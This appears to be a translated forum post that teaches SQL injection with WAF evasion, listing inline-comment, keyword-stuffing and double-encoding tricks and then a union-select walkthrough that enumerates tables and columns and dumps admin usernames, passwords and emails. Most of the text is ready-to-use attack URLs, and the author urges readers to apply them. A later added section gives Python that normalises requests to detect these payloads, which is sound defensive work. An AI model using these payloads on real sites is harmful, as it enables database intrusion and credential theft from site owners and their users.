Injectors use many tricks to get past a WAF's protection, namely commands written so that they slip through the WAF's filtering.
Examples of such commands are:
Code : //, --, /**/, #, --+, -- -, ;
1. Inline comments
code : id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()-- -
2. Buffer overflow / unexpected input:
code : id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A's)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--+
3. Replaced keywords (preg_replace and/or WAFs that take the same action):
code : id=1+UNIunionON+SeLselectECT+1,2,3--
4. Character encoding:
code : id=1%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+
-------------------------------------------------
OK. Here are some example attacks for bypassing that WAF.
1. Column count (order by):
index.php?id=1 order by 10-- Error
index.php?id=1 order by 9-- Error
index.php?id=1 order by 8-- Error
index.php?id=1 order by 7-- Error
index.php?id=1 order by 6-- Error
index.php?id=1 order by 5-- True
or:
index.php?id=1/**/order/**/by/**/10/*
index.php?id=1/**/order/**/by/**/9/*
index.php?id=1/**/order/**/by/**/8/*
index.php?id=1/**/order/**/by/**/7/*
index.php?id=1/**/order/**/by/**/6/*
index.php?id=1/**/order/**/by/**/5/*
2. Valid-string (union select) command:
index.php?id=-1 union select 1,2,3,4,5--
index.php?id=-1/**/union/**/select/**/1,2,3,4,5--
index.php?id=-1+un/**/ion+sel/**/ect+1,2,3--
index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,3,4,5--
or:
index.php?id=-1/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3--
3. User, version, data directory, etc.:
index.php?id=-1 union select 1,2,database(),4,5--
index.php?id=-1 union select 1,2,user(),4,5--
index.php?id=-1 union select 1,2,version(),4,5--
index.php?id=-1 union select 1,2,@@datadir,4,5--
How to combine them:
index.php?id=-1 union select 1,2,group_concat(database(),0x3a,user(),0x3a,version()),4,5--
4. List all tables:
index.php?id=-1 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()--
index.php?id=-1/**/union/**/select/**/1,2,group_concat(table_name),4,5/**/from/**/information_schema.tables/**/where/**/table_schema=database()--
index.php?id=-1+UNION+SELECT+1,2,GROUP_CONCAT(TABLE_NAME),4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,GrOUp_COnCaT(TABLE_NAME),4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--
5. List all databases:
index.php?id=-1+UNION+SELECT+1,2,GROUP_CONCAT(SCHEMA_NAME),4,5+FROM+INFORMATION_SCHEMA.SCHEMATA--
or:
index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,GrOUp_COnCaT(SCHEMA_NAME),4,5+FROM+INFORMATION_SCHEMA.SCHEMATA--
6. Now we look at the columns of the table we want:
index.php?id=-1 union select 1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646d696e
index.php?id=-1/**/union/**/select/**/1,2,group_concat(column_name),4,5 from information_schema.columns where table_name=0x61646d696e
index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,GROUP_CONCAT(COLUMN_NAME),4,5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e
index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,GrOUp_COnCaT(COLUMN_NAME),4,5+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x61646d696e
7. Final step:
index.php?id=-1 union select 1,2,group_concat(user,0x3a,password),4,5 from admin--
index.php?id=-1/**/union/**/select/**/1,2,group_concat(user,0x3a,password),4,5 from admin--
index.php?id=-1+/*!UNION*/+/*!SELECT*/+1,2,GrOUp_COnCaT(user,0x3a,password,0x3a,email),3,4,5+FROM+admin--
index.php?id=-1+un/**/ion+sel/**/ect+1,2,GrOUp_COnCaT(user,0x3a,password,0x3a,email),3,4,5+FROM+admin--
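Seen from the defending side, the four evasion styles listed at the top and the query shapes in the walkthrough all become visible once the request is canonicalised before any signature is matched: decode until stable, resolve the MySQL /*!...*/ hint comments, treat other comments as separators, and inspect what a one-pass keyword filter would leave behind. The Python below is an added example of that normalisation, not code from the original post; the sample query strings are constructed here, and the signature names and the views/detect helpers are my own.

```python
import re
from urllib.parse import unquote_plus

# Constructed query strings modelled on the bypass styles and query shapes in this
# post (not captured traffic). "benign" must stay clean.
SAMPLES = {
    "inline_comment":   "id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM+/*information_schema*/.tables",
    "split_keyword":    "id=-1+un/**/ion+sel/**/ect+1,2,3--",
    "keyword_stuffing": "id=1+UNIunionON+SeLselectECT+1,2,3--",
    "double_encoding":  "id=1%252f%252a*/UNION%252f%252a*/SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+",
    "table_dump":       "id=-1+/*!UNION*/+/*!SELECT*/+1,2,GrOUp_COnCaT(TABLE_NAME),4,5+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE()--",
    "benign":           "id=15&sort=name&page=2",
}

SIGNATURES = {
    "union_select":       re.compile(r"\bunion\b.*\bselect\b"),
    "schema_enumeration": re.compile(r"\binformation_schema\b|\bgroup_concat\s*\("),
    "fingerprint_call":   re.compile(r"\b(database|user|version)\s*\(\s*\)|@@datadir"),
}

def strip_keywords_once(s):
    """The single-pass preg_replace-style filter the post calls bypassable:
    one removal turns 'UNIunionON' into 'UNION', so the keyword survives."""
    return re.sub(r"union|select", "", s, flags=re.I)

def views(raw, max_decode=3):
    """Canonical forms a WAF should inspect instead of the raw bytes: URL-decoded
    until stable, /*!X*/ resolved to X (MySQL executes it), other comments tried
    both as a separator and as nothing, whitespace collapsed, lowercased. Each
    view is also run through the one-pass filter to expose stuffed keywords."""
    s = raw
    for _ in range(max_decode):                      # %252f -> %2f -> /
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    s = re.sub(r"/\*!\s*(.*?)\s*\*/", r" \1 ", s, flags=re.S)
    out = []
    for filler in (" ", ""):
        v = re.sub(r"/\*.*?\*/", filler, s, flags=re.S)
        v = re.sub(r"\s+", " ", v).strip().lower()
        out += [v, strip_keywords_once(v)]
    return out

def detect(raw):
    """Sorted names of the signatures that fire on any view of the query string."""
    vs = views(raw)
    return sorted(name for name, rx in SIGNATURES.items()
                  if any(rx.search(v) for v in vs))
```

Matching on the raw bytes alone misses every sample except the plain one; matching on the canonical views flags all five attack samples and leaves the benign request clean.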
For a proof of concept, friends, please build on this yourselves when you perform an injection.
I will also write a tutorial for the proof of concept later, though.
Regards ..